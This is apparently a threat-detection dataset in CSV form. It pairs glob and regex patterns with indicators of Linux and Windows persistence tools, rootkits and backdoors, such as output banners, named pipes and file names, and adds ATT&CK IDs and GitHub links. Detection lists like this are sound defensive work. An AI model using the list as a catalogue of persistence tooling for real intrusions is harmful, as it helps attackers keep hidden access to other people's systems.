"*[+] Backdoor user persistence established!*",".{0,1000}\[\+\]\sBackdoor\suser\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] Bind shell persistence establish*",".{0,1000}\[\+\]\sBind\sshell\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] Capabilities backdoor persistence establish*",".{0,1000}\[\+\]\sCapabilities\sbackdoor\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] COM Hijacked!*",".{0,1000}\[\+\]\sCOM\sHijacked!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*[+] Created Elevated HKLM:*",".{0,1000}\[\+\]\sCreated\sElevated\sHKLM\:.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#content","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*[+] Created malicious pre-commit hook in *",".{0,1000}\[\+\]\sCreated\smalicious\spre\-commit\shook\sin\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] Cron persistence established*",".{0,1000}\[\+\]\sCron\spersistence\sestablished.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] DLL dropped!*",".{0,1000}\[\+\]\sDLL\sdropped!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*[+] Docker container persistence establish*",".{0,1000}\[\+\]\sDocker\scontainer\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] Elevated to SYSTEM privileges*",".{0,1000}\[\+\]\sElevated\sto\sSYSTEM\sprivileges.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#content","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*[+] Executing technique - hiding scheduled task*",".{0,1000}\[\+\]\sExecuting\stechnique\s\-\shiding\sscheduled\stask.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*[+] Git persistence establish*",".{0,1000}\[\+\]\sGit\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] init.d backdoor establish*",".{0,1000}\[\+\]\sinit\.d\sbackdoor\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] MOTD backdoor persistence establish*",".{0,1000}\[\+\]\sMOTD\sbackdoor\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] Registry key set. DLL will be loaded on reboot*",".{0,1000}\[\+\]\sRegistry\skey\sset\.\sDLL\swill\sbe\sloaded\son\sreboot.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","#content","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*[+] Removed malicious entry from pre-commit hook in *",".{0,1000}\[\+\]\sRemoved\smalicious\sentry\sfrom\spre\-commit\shook\sin\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] Removing scheduled task on disk artifact*",".{0,1000}\[\+\]\sRemoving\sscheduled\stask\son\sdisk\sartifact.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*[+] Safety checks passed. Implanting your DLL*",".{0,1000}\[\+\]\sSafety\schecks\spassed\.\sImplanting\syour\sDLL.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","#content","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*[+] SharpHide running as elevated user*",".{0,1000}\[\+\]\sSharpHide\srunning\sas\selevated\suser.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#content","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*[+] SharpHide running as normal user*",".{0,1000}\[\+\]\sSharpHide\srunning\sas\snormal\suser.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#content","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*[+] SSH key persistence established!*",".{0,1000}\[\+\]\sSSH\skey\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] Success! LD_PRELOAD has been added!*",".{0,1000}\[\+\]\sSuccess!\sLD_PRELOAD\shas\sbeen\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] Systemd Generator persistence established!*",".{0,1000}\[\+\]\sSystemd\sGenerator\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] The scheduled task is hidden and invisible now*",".{0,1000}\[\+\]\sThe\sscheduled\stask\sis\shidden\sand\sinvisible\snow.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*[+] Updated Elevated HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon key UserInit*",".{0,1000}\[\+\]\sUpdated\sElevated\sHKLM\:Software\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\Winlogon\skey\sUserInit.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#content","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*[+] User * added to /etc/passwd with root privileges.*",".{0,1000}\[\+\]\sUser\s.{0,1000}\sadded\sto\s\/etc\/passwd\swith\sroot\sprivileges\..{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] User * has been modified to have UID 0 (root privileges).*",".{0,1000}\[\+\]\sUser\s.{0,1000}\shas\sbeen\smodified\sto\shave\sUID\s0\s\(root\sprivileges\)\..{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] User persistence through the new * user established!*",".{0,1000}\[\+\]\sUser\spersistence\sthrough\sthe\snew\s.{0,1000}\suser\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] Using WMI to set WMI SD*",".{0,1000}\[\+\]\sUsing\sWMI\sto\sset\sWMI\sSD.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#content","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*[+] XDG persistence established!*",".{0,1000}\[\+\]\sXDG\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[D3m0niz3d]~#*",".{0,1000}\[D3m0niz3d\]\~\#.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*[PRIVESC] Giving token full privileges for PID*",".{0,1000}\[PRIVESC\]\sGiving\stoken\sfull\sprivileges\sfor\sPID.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#content","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*[PRIVESC] Stealing token from PID *",".{0,1000}\[PRIVESC\]\sStealing\stoken\sfrom\sPID\s.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#content","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*\.\pipe\$77childproc*",".{0,1000}\\\.\\pipe\\\$77childproc.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\.\pipe\$77childproc64*",".{0,1000}\\\.\\pipe\\\$77childproc64.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\.\pipe\$77control_redirect*",".{0,1000}\\\.\\pipe\\\$77control_redirect.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\\.\\pipe\\$77childproc*",".{0,1000}\\\\\.\\\\pipe\\\\\$77childproc.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\\.\\pipe\\$77control_redirect*",".{0,1000}\\\\\.\\\\pipe\\\\\$77control_redirect.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\\\\.\\Cronos*",".{0,1000}\\\\\\\\\.\\\\Cronos.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*\\\\.\\pipe\\$77childproc64*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\\$77childproc64.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\\pipe\\$77control*",".{0,1000}\\\\pipe\\\\\$77control.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*\2fac5c2a114c7896c33fb2b0a9f6443d\*",".{0,1000}\\2fac5c2a114c7896c33fb2b0a9f6443d\\.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*\AbandonedCOMKeys.*",".{0,1000}\\AbandonedCOMKeys\..{0,1000}","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","0","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*\ABPTTS-master*",".{0,1000}\\ABPTTS\-master.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","731","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z"
"*\ADCS.ps1*",".{0,1000}\\ADCS\.ps1.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","179","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z"
"*\Add-KeeThiefLurker.ps1*",".{0,1000}\\Add\-KeeThiefLurker\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*\AmsiProvider.cpp*",".{0,1000}\\AmsiProvider\.cpp.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","N/A","10","2","141","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z"
"*\AmsiProvider.sln*",".{0,1000}\\AmsiProvider\.sln.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","N/A","10","2","141","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z"
"*\AMSI-Provider-main*",".{0,1000}\\AMSI\-Provider\-main.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","N/A","10","2","141","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z"
"*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.bat*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.cmd*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.cmd.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.hta*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.hta.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.ps1*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.ps1.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.vbs.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A"
"*\AtNow \\*",".{0,1000}\\AtNow\s\\\\.{0,1000}","greyware_tool_keyword","atnow","AtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TA","T1053 - T1059","TA0002 ","N/A","APT18 - APT29 - APT32 - Cobalt - RTM","Persistence","https://www.nirsoft.net/utils/atnow.html","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A"
"*\atnow.exe*",".{0,1000}\\atnow\.exe.{0,1000}","greyware_tool_keyword","atnow","AtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TA","T1053 - T1059","TA0002 ","N/A","APT18 - APT29 - APT32 - Cobalt - RTM","Persistence","https://www.nirsoft.net/utils/atnow.html","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A"
"*\atnow.zip*",".{0,1000}\\atnow\.zip.{0,1000}","greyware_tool_keyword","atnow","AtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TA","T1053 - T1059","TA0002 ","N/A","APT18 - APT29 - APT32 - Cobalt - RTM","Persistence","https://www.nirsoft.net/utils/atnow.html","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A"
"*\autodiscover\brute.go*",".{0,1000}\\autodiscover\\brute\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*\backdoor.bat*",".{0,1000}\\backdoor\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*\backdoor.exe*",".{0,1000}\\backdoor\.exe.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*\backdoor\backdoor.mk*",".{0,1000}\\backdoor\\backdoor\.mk.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*\backdoor\backdoor.project*",".{0,1000}\\backdoor\\backdoor\.project.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
